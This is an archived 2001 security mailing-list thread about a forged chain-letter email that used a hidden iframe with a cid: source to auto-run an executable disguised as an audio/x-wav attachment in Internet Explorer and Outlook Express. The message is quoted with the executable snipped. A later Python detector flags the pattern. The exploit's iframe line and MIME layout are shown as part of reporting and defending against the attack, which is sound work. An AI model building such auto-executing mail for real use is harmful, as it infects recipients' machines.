Vulnerability Development mailing list archives

RE: A very dangerous mail...


From: Aidan O'Kelly <okelly () xnet ie>
Date: Mon, 23 Jul 2001 15:42:40 +0100


'Microsoft IE MIME Header Attachment Execution Vulnerability'
It was discovered a couple of months ago. If it were an exe it would have run,
although since it asked you whether you want to save it or run it, it means
your system is patched anyway.

Explanation and example.

http://www.kriptopolis.com/cua/eml.html



-----Original Message-----
From: Marius Huse Jacobsen [mailto:mahuja () c2i net]
Sent: 20 July 2001 22:24
To: vuln-dev () securityfocus com
Subject: A very dangerous mail...


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Edited to protect any innocents.
Obvious forgery (supposedly from microsoft.com)
I'm using ZoneAlarm MailSafe -> .exe changed to .zl9
It tries to start the attachment exe automatically (Outlook Express)
- - it asks me if I want to save or start the zl9 file but I don't know
what it would do to an exe.

Exactly how bad is it? The offending line seems to be
<iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe>

Html email was a curse to begin with and it hasn't become any better.
Can anyone give me that ascii ribbon sig?


8< --------- Start offending letter -----------
Return-Path: <zina () somewhereonthenet com>
Received: from smtp08.somewhereonthenet.com
(smtp08.somewhereonthenet.com [196.*.*.*])
 by mail.my_isp.com (8.9.3/8.9.3) with ESMTP id PAA16304
 for <my () mail addy>; Sat, 14 Jul 2001 15:10:00 +0200 (MET DST)
Received: from microsoft.com ([196.*.*.*])
 by smtp08.somewhereonthenet.com (Sun Internet Mail Server
sims.3.5.2000.03.23.18.03.p10)
 with SMTP id <0GGG009BGSJHYE () smtp08 iafrica com> for my () mail addy;
Sat,
 14 Jul 2001 15:09:40 +0200 (SAT)
Date: Sat, 14 Jul 2001 15:09:01 +0100
From: Lynda () smtp08 somewhereonthenet com
Subject: Fw: 100,000 lemmings can't be ...
To: removed () smtp08 somewhereonthenet com
Message-id: <0GGG009BISJHYE () smtp08 somewhereonthenet com>
MIME-version: 1.0
Content-type: multipart/mixed; boundary="nymph"

This is a multi-part message in MIME format.

- --nymph
Content-Type: text/html;
        charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML>
<HEAD>
</HEAD>
<BODY bgColor=3D#ffffff>
<iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe>
<P align=center><FONT size=7><SPAN
class=590014113-13042001>SMACK!!!</SPAN></FONT></P>
<P align=center><FONT size=7><SPAN class=590014113-13042001>You have
been
hit</SPAN></FONT></P>
<P align=center><SPAN class=590014113-13042001>This is the
funny-attachment war!
You have just been hit and by the rule book you can't hit this person
back. To
be in the game you need to send this message to five of your friends,
try to
find some small and funny attachment to send along. If you don't have
time use
the one you got hit by, go ahead hit someone!</SPAN></P>
<P align=center><FONT size=7><SPAN
class=590014113-13042001></SPAN></FONT>&nbsp;</P></BODY></HTML>

- --nymph
Content-Type: audio/x-wav;
        name="setup.zl9"
Content-Transfer-Encoding: base64
Content-ID: <THE-CID>

<snip .exe content>

- --nymph
<snip fortune.zip>

- --nymph--


-----BEGIN PGP SIGNATURE-----
Version: PGP 7.0.4

iQA/AwUBO1ihZUcYTo91XF1EEQImJgCg5UccaNK/H1g27tAzUm23TayOfpQAnjDk
sqjAlFfiJIKdd21U6wxArNXb
=63JI
-----END PGP SIGNATURE-----

_________________________________________
Aidan O'Kelly
Systems Administrator      okelly () xnet ie

Xnet - The Data Storage People
Dublin: +353 (1) 2740 100
Belfast: +44(28) 9073 5872
www.xnet.ie | storage () xnet ie

*******************************************************************
 Privileged/Confidential Information may be contained in this
 message. If you are not the addressee indicated in this message
 (or responsible for delivery of the message to such person), you
 may not copy or deliver this message to anyone. In such case,
 you should destroy this message and kindly notify the sender by
 reply email. Please advise immediately if you or your employer do
 not consent to Internet email for messages of this kind. Opinions,
 conclusions and other information in this message that do not relate
 to the official business of Xnet shall be understood as
 neither given nor endorsed by it.
 ********************************************************************
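The trick Aidan points to is a type/extension mismatch: the attachment is declared audio/x-wav, a type that unpatched IE 5.01/5.5 rendered inline without prompting, while the payload is a Windows executable, and the zero-size iframe with a cid: source pulls the part in as soon as the HTML body is displayed. The following is an added example, not code from either poster or from the advisory: a small Python detector that parses a raw message and flags parts showing that pattern. The sample message is reconstructed from the one posted above, with the attachment name restored to setup.exe (ZoneAlarm had renamed it .zl9) and a constructed 64-byte MZ stub in place of the snipped .exe body; the sets of "inline-rendered" types and executable extensions are illustrative assumptions, not lists from the advisory.

```python
import base64
import email
import os
import re
from email import policy

# Types that pre-MS01-020 IE would open inline without a prompt.
# Illustrative subset assumed for this example, not the advisory's list.
INLINE_TYPES = {"audio/x-wav", "audio/wav", "audio/basic",
                "image/gif", "image/jpeg", "image/png", "image/bmp"}
# Extensions Windows executes on open; illustrative subset, assumed.
EXEC_EXTENSIONS = {".exe", ".com", ".bat", ".cmd", ".scr", ".pif",
                   ".vbs", ".js", ".hta"}
PE_MAGIC = b"MZ"  # every DOS/PE executable begins with these two bytes

# Matches <iframe ... src=cid:XYZ ...>, quoted or unquoted, any case.
CID_IFRAME_RE = re.compile(r'<iframe[^>]*\bsrc\s*=\s*["\']?cid:([^"\'\s>]+)', re.I)

# Constructed sample: the posted message with headers trimmed, the attachment
# name restored to setup.exe and a 64-byte MZ stub standing in for the .exe.
SAMPLE_MAIL = b"""\
From: Lynda@smtp08.somewhereonthenet.com
Subject: Fw: 100,000 lemmings can't be ...
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="nymph"

This is a multi-part message in MIME format.

--nymph
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe>
<P align=3Dcenter>SMACK!!! You have been hit</P>
</BODY></HTML>

--nymph
Content-Type: audio/x-wav; name="setup.exe"
Content-Transfer-Encoding: base64
Content-ID: <THE-CID>

""" + base64.encodebytes(b"MZ\x90\x00" + b"\x00" * 60) + b"""\
--nymph--
"""


def find_suspicious_parts(raw: bytes) -> list[dict]:
    """Return one finding per non-HTML part whose declared type, filename,
    payload bytes or cid: reference shows the MIME-type confusion trick."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    iframe_cids: set[str] = set()
    leaves = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        if part.get_content_type() == "text/html":
            # get_content() undoes the quoted-printable encoding for us
            html = part.get_content()
            iframe_cids.update(c.lower() for c in CID_IFRAME_RE.findall(html))
        else:
            leaves.append(part)

    findings = []
    for part in leaves:
        ctype = part.get_content_type()
        name = part.get_filename() or ""   # falls back to Content-Type name=
        ext = os.path.splitext(name)[1].lower()
        cid = part.get("Content-ID", "").strip().strip("<>").lower()
        payload = part.get_payload(decode=True) or b""
        reasons = []
        if ctype in INLINE_TYPES and ext in EXEC_EXTENSIONS:
            reasons.append(f"declared {ctype} but filename {name!r} is executable")
        if ctype in INLINE_TYPES and payload.startswith(PE_MAGIC):
            reasons.append(f"declared {ctype} but payload starts with a PE 'MZ' header")
        if cid and cid in iframe_cids:
            reasons.append(f"Content-ID <{cid}> is loaded by a hidden <iframe src=cid:>")
        if reasons:
            findings.append({"filename": name, "content_type": ctype,
                             "content_id": cid, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_parts(SAMPLE_MAIL):
        print(f["filename"], f["content_type"])
        for r in f["reasons"]:
            print("  -", r)
```

The three signals are deliberately independent: the filename check would have missed the posted message once ZoneAlarm renamed the attachment to .zl9, but the MZ header and the iframe-to-cid reference still fire, which is why a gateway filter should key on the declared type against the payload rather than on the extension alone.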

